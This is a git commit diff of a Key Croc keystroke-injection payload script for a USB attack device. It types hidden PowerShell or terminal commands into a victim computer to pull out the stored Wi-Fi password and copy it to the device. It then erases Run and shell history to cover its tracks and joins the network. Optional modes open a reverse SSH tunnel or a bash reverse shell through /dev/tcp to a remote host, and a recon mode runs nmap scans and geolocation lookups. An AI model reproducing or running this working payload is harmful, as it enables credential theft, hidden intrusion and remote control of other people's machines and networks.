Update Croc_getonline.txt

minor changes new options recon, ssh keycroc MATCH command perform specific tasks
2023-07-19 06:02:58 -04:00 · 2023-07-19 06:02:58 -04:00 · ec819336d7
parent 691ec577f4
commit ec819336d7
1 changed files with 329 additions and 83 deletions
--- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
+++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
@ -1,118 +1,364 @@
 # Title:           Croc_Getonline
 # Description:     Attempt to connect Keycroc automatically to target wifi access point
-#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
+#                  Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
 # Author:          spywill
-# Version:         3.5
+# Version:         4.1
 # Category:        Key Croc
 # Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro

-MATCH (getonline_W|getonline_R|getonline_L)
+#   getonline_W <-- MATCH word for windows, Attempt connection to access point
+#   getonline_L <-- MATCH word for Linux, Attempt connection to access point
+#   getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
+#   getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
+#   getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
+#   getonline_K <-- MATCH word for killing keycroc wlan0 interface
+#   getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
+#   getonline_H <-- MATCH word for entering ATTACKMODE HID
+#   getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
+#   getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
+#   getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot

-CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
-for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
+MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
+QUACK LOCK

-wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
+#---> Edit payload option below
+option=0
+keycroc_password=hak5croc
+wifi_pass=/tools/wifipass.txt

-if [ -f $wifi_pass ]; then
-	cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
-	rm -f $wifi_pass
+#---> Edit remote host below
+remote_user_name=EDIT_REMOTE_USERNAME_HERE
+remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
+remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
+port=7000
+
+#---> Edit known SSID and password below
+known_ssid=EDIT_KNOWN_SSID_HERE
+known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
+
+#---> Edit recon scan on/off below
+recon=off
+recon_loot=/root/udisk/tools/Target_SSID.txt
+
+#---> Edit Linux target password below
+if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+	target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+else
+	target_password=ENTER_LINUX_PASSWORD_HERE
 fi

-ATTACKMODE HID STORAGE
-Q DELAY 5000
-LED ATTACK
+recon_scan() {
+	if [ "$recon" = "on" ]; then
+		if [ "$LOOT" = "getonline_W" ]; then
+			QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
+			QUACK ENTER
+			QUACK DELAY 2000
+		elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
+			QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
+			QUACK ENTER
+			QUACK DELAY 2000
+		else
+			:
+		fi
+	elif [ "$recon" = "off" ]; then
+		:
+	else
+		:
+	fi
+}
+
+ENTER_STORAGE() {
+	if [ -f ~/udisk$wifi_pass ]; then
+		cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
+		rm -f ~/udisk$wifi_pass
+	fi
+	ATTACKMODE HID STORAGE
+	QUACK DELAY 5000
+	LED ATTACK
+}
+
+RESET_PAYLOAD() {
+	QUACK UNLOCK
+	sleep 5 ; LED OFF
+	killall -9 bash
+	killall -9 python
+	sleep 1
+	RELOAD_PAYLOADS
+}
+
+CLEAN_UP() {
+	if [ "$LOOT" = "getonline_W" ]; then
+		QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
+		QUACK ENTER
+		QUACK DELAY 2000
+	elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
+		QUACK STRING "history -c ; rm -f ~/.bash_history"
+		QUACK ENTER
+		QUACK DELAY 2000
+	else
+		:
+	fi
+}

 case $LOOT in
 	getonline_W)
-		Q GUI r
-		Q DELAY 3000
-		Q STRING "powershell -NoP -NonI -W Hidden"
-		Q ENTER
-		Q DELAY 5000
-		Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
-		Q ENTER
-		Q DELAY 3000
-		Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
-		Q ENTER
-		Q DELAY 5000
-		Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
-		Q ENTER
+		ENTER_STORAGE
+		QUACK GUI r
+		QUACK DELAY 3000
+		QUACK STRING "powershell -NoP -NonI -W Hidden"
+		QUACK ENTER
+		QUACK DELAY 5000
+		QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
+		QUACK ENTER
+		QUACK DELAY 3000
+		QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
+		QUACK ENTER
+		QUACK DELAY 5000
+		recon_scan
+		CLEAN_UP
+		QUACK STRING "exit"
+		QUACK ENTER
+		ATTACKMODE HID
 ;;
 	getonline_R)
-		Q CONTROL-ALT-d
-		Q CONTROL-ALT-t
-		Q DELAY 2000
-		Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
-		Q ENTER
-		Q DELAY 3000
-		Q STRING "umount \$MOUNT_POINT ; exit"
-		Q ENTER
+		ENTER_STORAGE
+		QUACK CONTROL-ALT-d
+		QUACK CONTROL-ALT-t
+		QUACK DELAY 2000
+		QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
+		QUACK ENTER
+		QUACK DELAY 3000
+		recon_scan
+		CLEAN_UP
+		QUACK STRING "umount \$MOUNT_POINT ; exit"
+		QUACK ENTER
+		ATTACKMODE HID
 ;;
 	getonline_L)
-		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
-			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+		ENTER_STORAGE
+		QUACK CONTROL-ALT-d
+		QUACK ALT-t
+		QUACK DELAY 2000
+		QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "$target_password"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
+		QUACK ENTER
+		QUACK DELAY 3000
+		recon_scan
+		CLEAN_UP
+		QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
+		QUACK ENTER
+		ATTACKMODE HID
+;;
+	getonline_N)
+		LED B
+		sleep 2
+		echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
+;;
+	getonline_F)
+		if [ -f ~/udisk$wifi_pass ]; then
+			LED B
+			sleep 2
 		else
-			PC_PW=LINUX
+			LED R
+			RESET_PAYLOAD
 		fi
-		Q CONTROL-ALT-d
-		Q ALT-t
-		Q DELAY 2000
-		Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "$PC_PW"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
-		Q ENTER
-		Q DELAY 2000
-		Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
-		Q ENTER
-		Q DELAY 3000
-		Q STRING "sudo umount \$MOUNT_POINT ; exit"
-		Q ENTER
+;;
+	getonline_K)
+		ifconfig wlan0 down
+		LED R
+		RESET_PAYLOAD
+;;
+	getonline_S)
+		ATTACKMODE HID STORAGE
+		RESET_PAYLOAD
+;;
+	getonline_H)
+		ATTACKMODE HID
+		RESET_PAYLOAD
+;;
+	getonline_P)
+		ATTACKMODE HID SERIAL
+		RESET_PAYLOAD
+;;
+	getonline_A)
+		ATTACKMODE HID AUTO_ETHERNET
+		RESET_PAYLOAD
+;;
+	getonline_X)
+		LED R
+		rm -f /root/udisk/payloads/Croc_getonline.txt
+		rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
+		rm -f $recon_loot root/udisk/config.txt
+		apt -y remove sshpass
+		reboot --force
 ;;
 esac
-
-ATTACKMODE HID
 sleep 3

-LED SETUP
-kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
+word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
+if [[ $word_count -eq 2 ]]; then
+	ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
+	matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
+	sleep 1
+	if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
+		LED SETUP
+	else
+		LED R
+		RESET_PAYLOAD
+	fi
+else
+	LED R
+	RESET_PAYLOAD
+fi
+
+kill -9 $(pidof wpa_supplicant)
+kill -9 $(pidof dhclient)
 ifconfig wlan0 down

 if [ "$LOOT" = "getonline_W" ]; then
-	sed -i '0,/./s/^.//' $wifi_pass
-	sed -i 's/\r//g' $wifi_pass
+	sed -i '0,/./s/^.//' ~/udisk$wifi_pass
+	sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
+	sed -i 's/\r//g' ~/udisk$wifi_pass
 fi

-sed -i 's/\( \)*/\1/g' $wifi_pass
-sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
-sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
-wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
+sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
+sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
+sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
+wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
+
 ifconfig wlan0 up
-wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
+wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
+dhclient wlan0
 sleep 3
 systemctl restart ssh.service

-[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
+if : >/dev/tcp/8.8.8.8/53; then
+	if [ $option -eq 0 ]; then
+		:
+	elif [ $option -eq 1 ]; then
+		case "$LOOT" in
+			getonline_W)
+				QUACK GUI m
+				QUACK GUI r
+				QUACK DELAY 2000
+				QUACK STRING "powershell"
+				QUACK ENTER
+				QUACK DELAY 5000
+		;;
+			getonline_R)
+				QUACK CONTROL-ALT-d
+				QUACK CONTROL-ALT-t
+				QUACK DELAY 2000
+		;;
+			getonline_L)
+				QUACK CONTROL-ALT-d
+				QUACK ALT-t
+				QUACK DELAY 2000
+		;;
+		esac
+		QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
+		QUACK ENTER
+		QUACK DELAY 2000
+		QUACK STRING "$keycroc_password"
+		QUACK ENTER
+	elif [ $option -eq 2 ]; then
+		status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
+		if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
+			apt -y install sshpass
+		else
+			:
+		fi
+		sleep 1
+		if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
+			cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
+			rm -rf ~/.ssh 2>/dev/null
+			ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
+			sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
+			sleep 1
+			ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
+		else
+			LED R
+			sleep 1
+		fi
+	elif [ $option -eq 3 ]; then
+		if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
+			/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
+		else
+			LED R
+			sleep 1
+		fi
+	else
+		LED FINISH
+	fi
+	LED FINISH
+else
+	LED R
+fi
+
 sleep 3
 LED OFF
+QUACK UNLOCK
+
+if [ "$recon" = "on" ]; then
+	LED C SLOW
+	echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
+	ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
+	iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
+	echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
+	ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
+	cat /etc/resolv.conf | grep nameserver >> $recon_loot
+
+	echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
+	calculate_network_range() {
+		ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
+		netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
+		IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
+		IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
+		network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
+		echo "$network_range"
+	}
+	perform_nmap_scan() {
+		local network_range=$1
+		nmap -T4 -F $network_range >> $recon_loot
+	}
+	network_range=$(calculate_network_range)
+	perform_nmap_scan $network_range
+
+	echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
+	curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
+	echo -ne "\n\n" >> $recon_loot
+	LED OFF
+elif [ "$recon" = "off" ]; then
+	:
+else
+	:
+fi